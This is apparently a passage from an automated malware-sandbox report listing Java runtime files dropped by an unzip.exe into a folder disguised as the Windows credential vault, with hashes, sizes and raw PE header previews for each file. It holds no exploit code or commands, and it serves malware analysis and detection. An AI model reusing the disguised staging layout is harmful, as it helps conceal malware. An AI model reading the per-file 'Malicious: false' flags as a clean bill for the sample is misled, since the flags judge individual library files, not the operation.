SSDEEP:	12288:kKB+zFjoLcAtFSYy9PA7TEsnmLIxhUgiW6QR7t5s03Ooc8dHkC2eszslz:kKMzFj4tFSYyO7TEsnmLIe03Ooc8dHkw
MD5:	DC739066C9D0CA961CBA2F320CADE28E
SHA1:	81ED5F7861E748B90C7AE2D18DA80D1409D1FA05
SHA-256:	74E9268A68118BB1AC5154F8F327887715960CCC37BA9DABBE31ECD82DCBAA55
SHA-512:	4EB181984D989156B8703FD8BB8963D7A5A3B7F981FE747C6992993B7A1395A21F45DBEDF08C1483D523E772BDF41330753E1771243B53DA36D2539C01171CF1
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......)..$m..wm..wm..w...vo..wd..w{..wm..w...w..vn..w..vf..w..vd..w..v...w..vl..w..wl..w..vl..wRichm..w........................PE..L...$..i.........."!...$.....z...............0.......................................,....@A........................@Z......<c...........................O.......5...U..T............................T..@............`..4............................text............................... ..`.data...L'...0......................@....idata..^....`.......6..............@..@.rsrc................N..............@..@.reloc...5.......6...R..............@..B........................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Roaming\Microsoft\Vault\cred\jre\jre-1.8\bin\msvcp140_1.dll

Download File

Process:	C:\Users\user\AppData\Roaming\Microsoft\Vault\cred\unzip.exe
File Type:	PE32 executable (DLL) (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	33088
Entropy (8bit):	6.926006050112116
Encrypted:	false
SSDEEP:	384:E6sWCFIvQX2UJFJwjsX/LWcm5gW41QgKSt+eZRh1FNGaR9zBRbuvsHRN7JdDeZRG:n5CfGUnJFXGUzlvRlUW9zBcwJdDU9zs
MD5:	CA41F812E04BF186926C8E312ED86990
SHA1:	06AD85C589487BB6A172C41164E404C152F58C1B
SHA-256:	037DA271A83151DEBAA648A35CF5CE9EE9B8FEDAA7E437BEE1B44ECE54AD9933
SHA-512:	796E43A7057EF7E0FC6863C221E43CEC4E14C019E5EA2526CE4683F29702C25E7F478B1F27AF59B21302DE0E466483D1B846409F1E976D04C687F84B2C2DDABD
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........l.............+.............\.......\...............\.......\.......\.......\.......\.......Rich............................PE..L...D.a..........."!...$............@........0...............................p......A#....@A...........................J....@..x....P...............2..@O...`..x.......T...........................X...@............@...............................text............................... ..`.data...0....0......."..............@....idata.......@.......$..............@..@.rsrc........P.....................@..@.reloc..x....`......................@..B........................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Roaming\Microsoft\Vault\cred\jre\jre-1.8\bin\msvcp140_2.dll

Download File

Process:	C:\Users\user\AppData\Roaming\Microsoft\Vault\cred\unzip.exe
File Type:	PE32 executable (DLL) (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	251768
Entropy (8bit):	6.773677335606689
Encrypted:	false
SSDEEP:	6144:E/ex7sgt8CZyY0UPo/BYNn+crb9ok6h32Llz9Jt2/NWbZJ25:kex7sM8CZyH6hvrb9ok6h3GlLgNWzM
MD5:	0B9B70C45A35059CFF46D03E675C6390
SHA1:	44F28351B83485633F297F90DFF709C8A10B3640
SHA-256:	750B7F72FA474406CD4A50165183E64AF932E0DEFCD414A01A56EC79DC6FEF9F
SHA-512:	86DE24ABC98E66BA695F6B76DD9762DF9B24484ED9FBF0E9A46D2FB97847524FA9F193A21EC94065BB2D42162F72194AD28834F80E57ADA2EA152E6D887FE442
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........T.~...~...~..B....~....>..~..5....~..5....~...~...~..5....~..5....~..5....~..5.R..~..5....~..Rich.~..................PE..L...."M..........."!...$..................... ............................................@A............................@....Q.......`..................xO...p...C..0E..T...........................pD..@............P...............................text............................... ..`.data....&... ...$..................@....idata.."....P.......0..............@..@.rsrc........`.......@..............@..@.reloc...C...p...D...D..............@..B................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Roaming\Microsoft\Vault\cred\jre\jre-1.8\bin\net.dll

Download File

Process:	C:\Users\user\AppData\Roaming\Microsoft\Vault\cred\unzip.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	89728
Entropy (8bit):	6.723906251202381
Encrypted:	false
SSDEEP:	1536:sARecQNWRlRp2q2MO/C4lUIeD+vGuI7ezFx7ZbdxF2um9Sh3WG47dxrF:syBQNWRHp2JpCIUZDYGuISzF9XRh3W7Z
MD5:	B14078F87CE6BD351EADE5E96B37825F
SHA1:	23DB82B9B306B41FF422C1A00F59C113073F1D3D
SHA-256:	8844D3B0D647FBF3A5AC0D83C50695CF841A753F07DD45FFE6DF83FE655FF468
SHA-512:	14E80681FB1C2B1EC4C2CAF816F0C53E1DCCC3D3686DD3B3BEA3D0DDB2CAA91CF86932B9CBBAB69CEC99553741D79DDC404BB3AC1F0DE92D81A8264D726A4E77
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......=..y..By..By..Bp.VBq..B...C{..B...Cs..B...Cx..B...Ct..B`..C}..By..B..B2..C~..B2..Cx..B`..Co..B`..Cx..B`.:Bx..B`..Cx..BRichy..B........PE..L....^.f...........!...$.....n......Y........................................p............@.........................@.......X'.......P...............6...(...`..\.......T...........................(...@.......................`....................text............................... ..`.rdata...R.......R..................@..@.data...d....@....... ..............@....rsrc........P......."..............@..@.reloc..\....`.......&..............@..B................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Roaming\Microsoft\Vault\cred\jre\jre-1.8\bin\nio.dll

Download File

Process:	C:\Users\user\AppData\Roaming\Microsoft\Vault\cred\unzip.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	57984
Entropy (8bit):	6.678602334017711
Encrypted:	false
SSDEEP:	768:OZHhtI1E9qs1j1FbjCjOImOPVms2xsyih7vp0cY0v8qXuXCazCM7OoYi5AMxkEq:OZHhtIwd1FXCxxT430UqX2ClMX7hxm
MD5:	5F8E8B3881C95E6A908E8AC2FF5C3AE8
SHA1:	43186F50367F3814EB3FAB051F4AE13AA62C0762
SHA-256:	488C29E0BDD86755B1A2873EB7A49FCD5FD7C1C4EE77221780F8CA552F06DB46
SHA-512:	6F5A19DF72E2210CB380D10F63C2F8EFB4F6FCADABF0F31AC47FF1D3FF24F0C570D19AF7FA0903AD2685EC6911DB3915639FDAEAA96A79E1CA44DA63C69D11F8
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......2#..vB..vB..vB...:-.~B...<..tB...<..}B...<..\|B...<..sB..o=..rB..vB...B..=:...B..o=..dB..o=..wB..o=A.wB..o=..wB..RichvB..........................PE..L....^.f...........!...$.\...^......;a.......p.......................................:....@.........................0....+...............................(...........{..T............................{..@............p...............................text....[.......\.................. ..`.rdata..lK...p...L...`..............@..@.data...\...........................@....rsrc...............................@..@.reloc..............................@..B........................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Roaming\Microsoft\Vault\cred\jre\jre-1.8\bin\npt.dll

Download File

Process:	C:\Users\user\AppData\Roaming\Microsoft\Vault\cred\unzip.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	23168
Entropy (8bit):	6.792948506727467
Encrypted:	false
SSDEEP:	384:Mpy30/NilN6QFGIJ5j4JYDnErUajeIYi1okYAM+o/8E9VF0NycB3:a/NGjGIbErU2zYi2AMxkE63
MD5:	8CB5D99C9EF98D6BCFEC0A2BB480ED66
SHA1:	50226C0ED4EE3CCE8B0CB2D75EA14A00EDF64BFE
SHA-256:	BCF3B7AD7466380F81B97B40105E341CD251A444CD6436E01AA78B053711A4C0
SHA-512:	AD257972696C06D7661118C2FFF4A29463829D79B58A3CEF0EA1EA9221791022A6A83673383BB94FC411BD0B8BDC9861575F59992B03689A7BADF4A8123F85A6
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......A.5!..[r..[r..[r...r..[r..Zs..[rN.Zs..[r..Zr+.[r..r..[r..^s..[r.._s..[r..Xs..[r.._s..[r..[s..[r..r..[r..Ys..[rRich..[r........PE..L...}^.f...........!...$............w........0...............................p............@..........................7..`....8.......P...............2...(...`......X3..T............................2..@............0...............................text...1........................... ..`.rdata.......0......................@..@.data........@.......*..............@....rsrc........P.......,..............@..@.reloc.......`.......0..............@..B........................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Roaming\Microsoft\Vault\cred\jre\jre-1.8\bin\orbd.exe

Download File

Process:	C:\Users\user\AppData\Roaming\Microsoft\Vault\cred\unzip.exe
File Type:	PE32 executable (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	22656
Entropy (8bit):	6.848963502533644
Encrypted:	false
SSDEEP:	384:zsb50EJRlOjtLyJ+82q+eflOMIYi1oGAM+o/8E9VF0NyOZaY:zsb50EfAX81jfl+YiPAMxkEYaY
MD5:	6D7DF0F5D18CB79DCE3E2E9D29E037EF
SHA1:	76CB635F8D98DB125F1130FBB2F0374E57523913
SHA-256:	DF77EBEC9AD1EBEB472DE3FDADB514498B4EF81E7B5D6D0065DB3486A489CA98
SHA-512:	C706C8859CE38EA70861689767E1FB1D639DBFF7E03CEA3C365FAC44131EFC83E584B0AA7D42B375207EBE570FC1EC40D0FF82E81B5E1892ABE6706C10E9A1DB
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......C.kF............................L...........................................1...........................Rich............PE..L....^.f...............$..................... ....@..........................`......T.....@.................................L'.......@..T............0...(...P...... #..T...........................`"..@............ ...............................text............................... ..`.rdata....... ......................@..@.data........0....... ..............@....rsrc...T....@......."..............@..@.reloc.......P......................@..B................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Roaming\Microsoft\Vault\cred\jre\jre-1.8\bin\pack200.exe

Download File

Process:	C:\Users\user\AppData\Roaming\Microsoft\Vault\cred\unzip.exe
File Type:	PE32 executable (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	22656
Entropy (8bit):	6.821647440261321
Encrypted:	false
SSDEEP:	384:PcNWbe0J4rLJaVjtyBY82AOefBOFIYi1o7AM+o/8E9VF0NyapyF:PcNWbe0X8XTfBtYisAMxkEBF
MD5:	A4F24491DD45A6D1BA9255C1EFBAF98B
SHA1:	D4A183B81A8B9FF5CBA0A006BD3EF6ADDFAAEB1F
SHA-256:	9C9D5F5C0123A148D50F5EA88C958A9794E0ABDB6CD70D3FEE61F13BCF1BB284
SHA-512:	ACB4550023B6D248DB2FDFAF227F0369798ABA41518D0490F7B17C5179C4476620A94D264F6E5273E7E73C2CA65E64FF6C6D9DE1020E04E53C195B5B9C3BF8F4
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......C.kF............................L...........................................1...........................Rich............PE..L....^.f...............$..................... ....@..........................`............@..................................&.......@..\............0...(...P......."..T............................!..@............ ...............................text............................... ..`.rdata..>.... ......................@..@.data........0....... ..............@....rsrc...\....@......."..............@..@.reloc.......P......................@..B................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Roaming\Microsoft\Vault\cred\jre\jre-1.8\bin\plugin2\msvcp140.dll

Download File

Process:	C:\Users\user\AppData\Roaming\Microsoft\Vault\cred\unzip.exe
File Type:	PE32 executable (DLL) (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	448408
Entropy (8bit):	6.693790505404224
Encrypted:	false
SSDEEP:	12288:kKB+zFjoLcAtFSYy9PA7TEsnmLIxhUgiW6QR7t5s03Ooc8dHkC2eszslz:kKMzFj4tFSYyO7TEsnmLIe03Ooc8dHkw
MD5:	DC739066C9D0CA961CBA2F320CADE28E
SHA1:	81ED5F7861E748B90C7AE2D18DA80D1409D1FA05
SHA-256:	74E9268A68118BB1AC5154F8F327887715960CCC37BA9DABBE31ECD82DCBAA55
SHA-512:	4EB181984D989156B8703FD8BB8963D7A5A3B7F981FE747C6992993B7A1395A21F45DBEDF08C1483D523E772BDF41330753E1771243B53DA36D2539C01171CF1
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......)..$m..wm..wm..w...vo..wd..w{..wm..w...w..vn..w..vf..w..vd..w..v...w..vl..w..wl..w..vl..wRichm..w........................PE..L...$..i.........."!...$.....z...............0.......................................,....@A........................@Z......<c...........................O.......5...U..T............................T..@............`..4............................text............................... ..`.data...L'...0......................@....idata..^....`.......6..............@..@.rsrc................N..............@..@.reloc...5.......6...R..............@..B........................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Roaming\Microsoft\Vault\cred\jre\jre-1.8\bin\plugin2\npjp2.dll

Download File

Process:	C:\Users\user\AppData\Roaming\Microsoft\Vault\cred\unzip.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	267392
Entropy (8bit):	5.540214222431998
Encrypted:	false
SSDEEP:	6144:ZyvBwxbh/UcODMM4cBqg8UyJNjuGZzfYtRD+E3ABjqDPQf7rh73eNCcD:ZyvBwxb3+
MD5:	DA76BBBDF9BC2AC13DE0E93A69F3FA81
SHA1:	663CB3D0B70EEEA7891456D57885745FF51C092F
SHA-256:	5AE0846BBB095D44CCC8E0E823966BABC1DB1CCDFFBF8E8AAD4A2EFA2A46A11D
SHA-512:	836562BF8044597C55CF2A97C32453C57EC9B08B2488093CDDC62C76254E988491B474D0DDF6ABE708182D60F6EAE4BFA63F7CA519A2410D9E2933833A6F7E66
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........5.{.f.{.f.{.f.."f.{.f)..g.{.f).Lf.{.f)..g.{.f)..g.{.f...g.{.f.{.f.z.f)..g.{.f...g.{.f...g.{.f...g.{.f..Nf.{.f...g.{.fRich.{.f................PE..L...._.f...........!...$.2..........;........P...............................0............@..........................1..D...T@..T.......ph...............(......T...(...T...........................h...@............P..<....-.......................text....1.......2.................. ..`.rdata..b....P.......6..............@..@.data...4!...p.......J..............@....rsrc...ph.......j...f..............@..@.reloc..T...........................@..B........................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Roaming\Microsoft\Vault\cred\jre\jre-1.8\bin\plugin2\vcruntime140.dll

Download File

Process:	C:\Users\user\AppData\Roaming\Microsoft\Vault\cred\unzip.exe
File Type:	PE32 executable (DLL) (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	90520
Entropy (8bit):	6.936349345750277
Encrypted:	false
SSDEEP:	1536:Lb8h/b8bgkjohTX6pz0y9v+xSUKF1IuCmgnKecbWJdazlTjznFKwcjzBG:LbWUgkOTX6ey9v+xSjFyuBecbWnaNjjb
MD5:	1D4FF3CF64AB08C66AE9A4013C89A3AC
SHA1:	F9EE15D0E9B0B7E04FF4C8A5DE5AFCFFE8B2527B
SHA-256:	65F620BC588D95FE2ED236D1602E49F89077B434C83102549EED137C7FDC7220
SHA-512:	65FBD68843280E933620C470E524FBA993AB4C48EDE4BC0917B4EBE25DA0408D02DAEC3F5AFCD44A3FF8ABA676D2EFF2DDA3F354029D27932EF39C9FDEA51C26
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........j..9..9..9...8..9..Y9..9..9...9y..8..9y..8..9y..8...9y..8..9y.59..9y..8..9Rich..9........PE..L...b............."!...$.....................................................P.......h....@A................................. .......0...................O...@.......$..T............................#..@............ ...............................text............................... ..`.data...............................@....idata....... ......................@..@.rsrc........0......................@..@.reloc.......@......................@..B................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Roaming\Microsoft\Vault\cred\jre\jre-1.8\bin\policytool.exe

Download File

Process:	C:\Users\user\AppData\Roaming\Microsoft\Vault\cred\unzip.exe
File Type:	PE32 executable (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	22656
Entropy (8bit):	6.823874630354483
Encrypted:	false
SSDEEP:	384:/s1ubeUJ4rLJa9jDy86S82EUefSOcIYi1oRfzAM+o/8E9VF0NyVY2IsE:/s1ubeU1B8zRfSqYisLAMxkEnIsE
MD5:	5F85157B3E5D033866777596C60452D3
SHA1:	7CA350758FC1D8C88527C8054F77DD8D712A1301
SHA-256:	1F2A31BD9EB7486A76DB2D1A86926123676F240A830E041FD9381005C95DAC28
SHA-512:	B44AA8013A7677DC89223854C1B879EA6529DA304786EFC08F95C5BA073AF0D0A27E0B31B0194879388F2F4E04B7BF11D4AFC668F3B6FA352BFF950170A7935A
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......C.kF............................L...........................................1...........................Rich............PE..L....^.f...............$..................... ....@..........................`............@..................................&.......@..p............0...(...P......."..T............................!..@............ ...............................text............................... ..`.rdata..F.... ......................@..@.data........0....... ..............@....rsrc...p....@......."..............@..@.reloc.......P......................@..B................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Roaming\Microsoft\Vault\cred\jre\jre-1.8\bin\prism_common.dll

Download File

Process:	C:\Users\user\AppData\Roaming\Microsoft\Vault\cred\unzip.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	60032
Entropy (8bit):	6.562728710325199
Encrypted:	false
SSDEEP:	768:7EBICaKKwKolIu+RseFWsliAoEvbpGrYPyDfe1OlU8qLfOXYipiAMxkEd:7OIOKK+R5himlQx2jOX7pgxZ
MD5:	ABAF3678A6A0CA3E58551C9316AB5C71
SHA1:	F28454BFE4462BDF07BC877566E8CB76C363B628
SHA-256:	5E530B3B43226D7AA7C6F95AEA12A08925048FB72A9419E1A377ABB4E4491441
SHA-512:	C5BD4C49F7EE822BE38F18C11C21700CD4939094FEDC59A894489A53AEAFEB371FB9F5EB16905B97D87EE1FC896FC518722563F698EA3652513B66B6A00097E3
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......G$...Ev..Ev..Ev..=..Ev..;w..Ev.H=w..Ev..Ew.+Ev..;s..Ev..;r..Ev..;u..Ev..:r..Ev..:v..Ev..:...Ev..:t..Ev.Rich.Ev.........PE..L...yT.f...........!...$............[...............................................$>....@.............................0.......x........................(..........(...............................h...@............................................text...?........................... ..`.rdata.. ...........................@..@.data...............................@....rsrc...............................@..@.reloc..............................@..B................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Roaming\Microsoft\Vault\cred\jre\jre-1.8\bin\prism_d3d.dll

Download File

Process:	C:\Users\user\AppData\Roaming\Microsoft\Vault\cred\unzip.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	123520
Entropy (8bit):	5.866542555025182
Encrypted:	false
SSDEEP:	3072:7BRZBV4d08c+ZdJI3dTdbd7YTwdRdNdg7j++1+1+PtW1+g+z+rfSoCxCVCEiJLC5:7LZBV4ywZ4
MD5:	21D57E6D7E31FB4532A79C108924685E
SHA1:	FEFB87CBD7C07EEA53AEB9BCF21825E1FDF8C989
SHA-256:	523D1159416E7D393E90981E7D19110ED9F90CAD50ED549C4778459C20834296
SHA-512:	B1018CF2D7793D25E6C76395E602BA8628288EB2A66A05A70D16B4004239C98E75FA1DB1776C52E0BB694E464D6391C993D4E914842AD0330124DBE7FB8DD982
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$...........J..J..J..C.O.@....^....@....H....N.....O..J.....S..Z..S..K..S.#.K..S..K..RichJ..........................PE..L...~T.f...........!...$.....$......:.....................................................@.........................P...L................................(......D.......................................@...............P............................text...i........................... ..`.rdata..8...........................@..@.data...............................@....rsrc...............................@..@.reloc..D...........................@..B................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Roaming\Microsoft\Vault\cred\jre\jre-1.8\bin\prism_sw.dll

Download File

Process:	C:\Users\user\AppData\Roaming\Microsoft\Vault\cred\unzip.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	56960
Entropy (8bit):	6.748976519641067
Encrypted:	false
SSDEEP:	1536:R6uFsMib1eqds2+0f7MRYlJJ1+hoWJ71xi:tFsMib1eqd+0jsYlJJMhoWJC
MD5:	7FA38E78354BA277BCBFD7A9F38554C9
SHA1:	B6D098AD59CA864E122BB780B2C97B63C142EFAB
SHA-256:	723FD5C2B340F17BBA675DDCE48807F18D751E2F0BAAFE24859702B092E9921E
SHA-512:	D3E21781111587DD2A8ED19A05778D06165D011D15069060195A6BFC16FD11018F78BFAC2E3C6BB5CA405ACDC49F0C3CDFADA52F6769C3F6BA158DDEAFD1867D
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$............v...v...v....`..v.._....v......v...v...v.._....v.._....v.._....v.......v.......v.......v.......v..Rich.v..........................PE..L....T.f...........!...$............................................................"6....@.............................D...D............................(..............................................@............................................text.............................. ..`.rdata..............................@..@.data...T...........................@....rsrc...............................@..@.reloc..............................@..B................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Roaming\Microsoft\Vault\cred\jre\jre-1.8\bin\resource.dll

Download File

Process:	C:\Users\user\AppData\Roaming\Microsoft\Vault\cred\unzip.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	21632
Entropy (8bit):	6.644743651077258
Encrypted:	false
SSDEEP:	384:0dDvhGmJh7bEjiMENcIYi1ofzAM+o/8E9VF0NyrBtq:0dkmr7zNNYiCAMxkERq
MD5:	7C184B51656B67B59439706AF7793CF0
SHA1:	32759A49D4E8AAAB96BBB586C9C5B871EB84F64C
SHA-256:	22E0BE0BC1BB4C2A307ED036950CB0681D330FBD609BBDDB4AD6349D6ED8C2AC
SHA-512:	057499CDA383BF3342B2223E8FD18D8827D5E8FF1AE9F74E848FFBEC310A155087760C33CE7660A7B143DC44E750A46DB8E9633D6449B8B68C63A89F31D861E2
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......y...=y..=y..=y..4.L.?y......?y..v...?y......6y......7y......<y..$...8y..=y...y..$...<y..$...<y..$. .<y..$...<y..Rich=y..................PE..L....^.f...........!...$..................... ...............................`.......>....@..........................%.........x....@...............,...(...P..d....!..T............................ ..@............ ..x............................text...k........................... ..`.rdata....... ......................@..@.data........0.......$..............@....rsrc........@.......&..............@..@.reloc..d....P.....................@..B................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Roaming\Microsoft\Vault\cred\jre\jre-1.8\bin\rmid.exe

Download File

Process:	C:\Users\user\AppData\Roaming\Microsoft\Vault\cred\unzip.exe
File Type:	PE32 executable (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	22656
Entropy (8bit):	6.8196227269052665
Encrypted:	false
SSDEEP:	384:7sNWbeEJ4rLJaNjjysA82UgXeflORIYi1oXAM+o/8E9VF0NyQbSa:7sNWbeES8DLflNYiQAMxkEuSa
MD5:	3C64E98CE278A02DA8F7898604902CA4
SHA1:	EA88621E584187CB4FC0C01A0D475A98558965C6
SHA-256:	60C8E59EAABCD92569E3BB75CC8B3F763273CF1054F85B52B441D5D21CEFA5E0
SHA-512:	302BB8E1FAFF406A8599ACC8C8B6D7F51DA7381C5613CF9B921473AEC74CA56BA4C42D4CDE4B8A34E95358F9788B7649DB6BD8A26F797D535A04BC9C13758DBF
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......C.kF............................L...........................................1...........................Rich............PE..L....^.f...............$..................... ....@..........................`.......p....@..................................&.......@..T............0...(...P......."..T............................!..@............ ...............................text............................... ..`.rdata..>.... ......................@..@.data........0....... ..............@....rsrc...T....@......."..............@..@.reloc.......P......................@..B................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Roaming\Microsoft\Vault\cred\jre\jre-1.8\bin\rmiregistry.exe

Download File

Process:	C:\Users\user\AppData\Roaming\Microsoft\Vault\cred\unzip.exe
File Type:	PE32 executable (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	22656
Entropy (8bit):	6.819020886018472
Encrypted:	false
SSDEEP:	384:YM1ubeUJ4rLJapjSy1S82cgefaOGIYi1o5AM+o/8E9VF0NybWpQGx/:YM1ubeU28TVfaYYi8AMxkEopF
MD5:	F127DEC9793705597A5151F8B4C3321B
SHA1:	3DC4F2100ED58AB71ADD837B491C8345164A82AE
SHA-256:	9581836A2293E924C8EEF54909BDD460B50D0AA4AAB0ABC28081A997E9ACAFD6
SHA-512:	B6A25C5AA320CA0328ED3F17B818BBC482F5A7E63F338927A12E852B26B5458F2AD573EDEA1F3702AF95E1AA0DA7401B077DAA3E061740AB074EE445E19D00DC
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......C.kF............................L...........................................1...........................Rich............PE..L....^.f...............$..................... ....@..........................`...........@..................................&.......@..p............0...(...P......."..T............................!..@............ ...............................text............................... ..`.rdata..F.... ......................@..@.data........0....... ..............@....rsrc...p....@......."..............@..@.reloc.......P......................@..B................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Roaming\Microsoft\Vault\cred\jre\jre-1.8\bin\servertool.exe

Download File

Process:	C:\Users\user\AppData\Roaming\Microsoft\Vault\cred\unzip.exe
File Type:	PE32 executable (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	22656
Entropy (8bit):	6.823174618978693
Encrypted:	false
SSDEEP:	384:7s1ubeUJ4rLJa9jxhy8VaS82DMXefSO5IYi1oFjAM+o/8E9VF0NyFQB:7s1ubeUB7r8EHfSFYiijAMxkE4B
MD5:	0F6316D63B080899732DCB1B3C65AFEA
SHA1:	F1D1DE6B87F22B23E6C0548859F04057142AD02B
SHA-256:	8DD9CB41302D645AD1C8F2A6EB26E4C746311A75B5D12A2D27513CAA27DC8CFF
SHA-512:	7CB445C499DEBD3C3AF4D5B46E2E712844B054E8D4C042E4F1616C036D5AAADC9C3A1565AF95D1372BDFCFF55EBC482E36A1E573E5A7A14F2982003C20A2A276
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......C.kF............................L...........................................1...........................Rich............PE..L....^.f...............$..................... ....@..........................`............@..................................&.......@..p............0...(...P......."..T............................!..@............ ...............................text............................... ..`.rdata..F.... ......................@..@.data........0....... ..............@....rsrc...p....@......."..............@..@.reloc.......P......................@..B................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Roaming\Microsoft\Vault\cred\jre\jre-1.8\bin\splashscreen.dll

Download File

Process:	C:\Users\user\AppData\Roaming\Microsoft\Vault\cred\unzip.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	191104
Entropy (8bit):	6.912677641471125
Encrypted:	false
SSDEEP:	3072:bDrFKeGFoH0PBp5dKFeLJZJfv56AXc89ENIAPvRyFGlwLXLrepudGCvPabbso:bD6oUPBv5Ja2EzPZ+GlwLQudGCvPabt
MD5:	034FE9B686A7ED797FB1B7C6AB70A509
SHA1:	03DA11054BFC31EE2EE1840294CC979E23C85BB2
SHA-256:	86A50C185326E2991B8C52FC3D596662DB0595AECB6BB22B9C491AC868C05960
SHA-512:	55E902425D507D42C5B5C3C7187DBD0813ACF8AA9696EF327416A69F7F1A4102E4DE68DC7F5F7EB12DA86DCA0C0DB69E66111E7003222E1F0D6EA0C146987A35
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........v.)...z...z...z.oCz...zli.{...zli-z...zli.{...zli.{...zli.{...z.o.{...z...zO..z.h.{...z.h.{...z.h/z...z.h.{...zRich...z................PE..L...~^.f...........!...$............@........ ...............................0......R.....@............................................................(... ......X...T...............................@............ ..T...D...`....................text...%........................... ..`.rdata..".... ......................@..@.data....1..........................@....rsrc...............................@..@.reloc....... ......................@..B................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Roaming\Microsoft\Vault\cred\jre\jre-1.8\bin\sspi_bridge.dll

Download File

Process:	C:\Users\user\AppData\Roaming\Microsoft\Vault\cred\unzip.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	38528
Entropy (8bit):	6.728999407293684
Encrypted:	false
SSDEEP:	384:kqDLd26iDkjSy1ieATp9HUibrdSA52bQjY2/9N2VZ3NNJljHbgSbGpZT36IYi1oI:kpadATpRrfNqzLbGpZ3YiBAMxkEL
MD5:	7EE4DDAFEEAE0C91E8AA0B0C230FE47C
SHA1:	CF260D4E2181AE308102AFBDE37722513A2202E8
SHA-256:	9379789A579A3C6292FCB7FBCB6AE84193DF17E64A2B00C1D078C7282400C7E5
SHA-512:	BF3492297A174E739BEB2847D421C1C1CE7B66345F336B4D3B1FD47AB644EC7016E922A4623CC0EE3EBDC745208EDEB7D65E98CBD1E110D0BD529055A4A7A9F1
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........P........../....b......b......b...................b...................C..........Rich...........................PE..L...}^.f...........!...$.<...2.......@.......P......................................J.....@..........................f..`...pi.......................n...(..........._..T...........................H^..@............P.. ............................text....:.......<.................. ..`.rdata..$!...P..."...@..............@..@.data...4............b..............@....rsrc................d..............@..@.reloc...............h..............@..B................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Roaming\Microsoft\Vault\cred\jre\jre-1.8\bin\ssv.dll

Download File

Process:	C:\Users\user\AppData\Roaming\Microsoft\Vault\cred\unzip.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	636544
Entropy (8bit):	5.578684628299698
Encrypted:	false
